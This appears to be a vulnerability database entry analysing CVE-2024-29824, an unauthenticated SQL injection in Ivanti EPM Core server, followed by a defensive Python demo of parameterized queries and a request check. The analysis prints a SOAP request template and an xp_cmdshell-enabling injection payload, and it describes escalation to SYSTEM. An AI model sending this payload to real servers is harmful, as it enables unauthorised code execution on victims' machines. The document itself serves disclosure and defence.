Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

CVE-2024-29824

Disclosure Date: May 31, 2024

Description

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to a SQL injection in the Core server; Ivanti has released a patch, as described in the official advisory and the related KB article. The injection can be leveraged to achieve unauthenticated remote code execution.

The function RecordGoodApp() in AppMonitorAction.cs is responsible for handling reports of “good” applications.

159     private static void RecordGoodApp(
160       LanDeskDatabase database,
161       string[] tokens,
162       DateTime reportDate,
163       int computer_idn)
164     {
165       try
166       {
167         GoodApp goodApp = new GoodApp(tokens);
168         try
169         {
170           string sql1 = string.Format("Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '{0}'", (object) goodApp.md5);
171           DataRow row1 = database.ExecuteRow(sql1);

As can be seen at line 170, goodApp.md5 is placed directly into the query text by string.Format, inside a single-quoted literal, with no escaping or parameterization. This value is attacker-controlled: it is taken from the pipe-delimited status string of an Action element submitted to the EventHandler web service, and the request requires no authentication. The attack consists of sending a SOAP request for the UpdateStatusEvents operation to this endpoint, substituting the md5 value with the malicious SQL:

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5=<SQL_COMMAND></status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>

To achieve remote code execution, the SQL Server extended stored procedure xp_cmdshell can be used. Because the value lands between single quotes, the injected md5 token must first close that literal with a single quote; the trailing -- then comments out the closing quote the original query appends. xp_cmdshell is disabled by default, so the payload enables it through sp_configure before calling it:

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '<MALICIOUS COMMAND>'--

A Metasploit module is already available for this attack.

Note that this is an unauthenticated attack and it usually results in privileged access to the vulnerable system. Two conditions matter in practice: enabling xp_cmdshell through sp_configure requires the ALTER SETTINGS server permission (held by the sysadmin and serveradmin roles), so the database login used by the EPM Core server must have it; and for a sysadmin login the command runs under the SQL Server service account, on the host running SQL Server, which may be the Core server itself or a separate database server. Since Ivanti EPM and SQL Server usually run as NT Service accounts, which hold SeImpersonatePrivilege, this access can be easily escalated to NT AUTHORITY\SYSTEM.
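The following is an added example, not code from the AttackerKB entry, the Metasploit module or Ivanti. It reproduces the string-concatenation pattern of line 170 against an in-memory SQLite table to show why the injected md5 token must begin with a quote, contrasts it with the parameterized form of the same query, and gives a simple check that flags UpdateStatusEvents requests whose GoodApp md5 token is not a bare 32-hex-digit hash. The pipe/equals token parsing, the one-row sample table and the sample requests are assumptions constructed for the example.

```python
"""Added example: concatenated vs. parameterized lookup, plus a request check.

Assumptions (not from the advisory): the status string is parsed as
'key=value|key=value', and ReportedGoodApps is modelled as a one-row SQLite table.
"""
import re
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TEMPURI_NS = "http://tempuri.org/"
MD5_RE = re.compile(r"[0-9a-fA-F]{32}")

# Constructed request: the envelope from the analysis above with a placeholder md5 token.
REQUEST_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <UpdateStatusEvents xmlns="http://tempuri.org/">
      <deviceID>string</deviceID>
      <actions>
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
          <status>GoodApp=1|md5={md5}</status>
        </Action>
      </actions>
    </UpdateStatusEvents>
  </soap12:Body>
</soap12:Envelope>"""


def build_request(md5_token: str) -> str:
    """Return a request carrying md5_token; '<' and '&' in a payload must be XML-escaped."""
    return REQUEST_TEMPLATE.format(md5=escape(md5_token))


def parse_status_tokens(status: str) -> dict:
    """Split 'key=value|key=value' (assumed to mirror the tokens handed to GoodApp(tokens))."""
    tokens = {}
    for part in status.split("|"):
        key, _, value = part.partition("=")
        tokens[key.strip()] = value
    return tokens


def extract_goodapp_md5s(soap_xml: str) -> list:
    """Collect the md5 token of every GoodApp=1 status in an UpdateStatusEvents request."""
    root = ET.fromstring(soap_xml)
    md5s = []
    for status in root.iter("{%s}status" % TEMPURI_NS):
        tokens = parse_status_tokens(status.text or "")
        if tokens.get("GoodApp") == "1" and "md5" in tokens:
            md5s.append(tokens["md5"])
    return md5s


def is_suspicious(soap_xml: str) -> bool:
    """True when any GoodApp md5 token is not a bare 32-hex-digit hash (e.g. it carries SQL)."""
    return any(MD5_RE.fullmatch(m) is None for m in extract_goodapp_md5s(soap_xml))


def vulnerable_query(md5: str) -> str:
    """Same concatenation as line 170 of RecordGoodApp(): the value lands inside single quotes."""
    return "Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = '%s'" % md5


def demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the ReportedGoodApps table, holding one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table ReportedGoodApps (ReportedGoodApps_Idn integer primary key, md5 text)")
    conn.execute("insert into ReportedGoodApps (md5) values ('d41d8cd98f00b204e9800998ecf8427e')")
    return conn


def lookup_vulnerable(conn, md5):
    """Executes the concatenated query: a quote in md5 rewrites the WHERE clause."""
    return conn.execute(vulnerable_query(md5)).fetchone()


def lookup_parameterized(conn, md5):
    """Hardened form: the driver binds md5 as data, so quotes cannot change the query."""
    return conn.execute(
        "Select ReportedGoodApps_Idn from ReportedGoodApps where md5 = ?", (md5,)
    ).fetchone()


if __name__ == "__main__":
    conn = demo_db()
    tautology = "' OR '1'='1"
    print(vulnerable_query(tautology))
    print("concatenated :", lookup_vulnerable(conn, tautology))     # (1,)
    print("parameterized:", lookup_parameterized(conn, tautology))  # None
    print("flagged      :", is_suspicious(build_request(tautology)))  # True
```

SQLite executes one statement per call, so the tautology is used here to prove the point instead of the stacked xp_cmdshell batch; on SQL Server the same concatenation also accepts the ';'-separated statements shown above. The request check is a coarse filter for web-server logs or an inline proxy: a legitimate GoodApp report carries a hex digest, and anything else in that token deserves a look.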

CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Vendors

  • Ivanti

Products

  • EPM
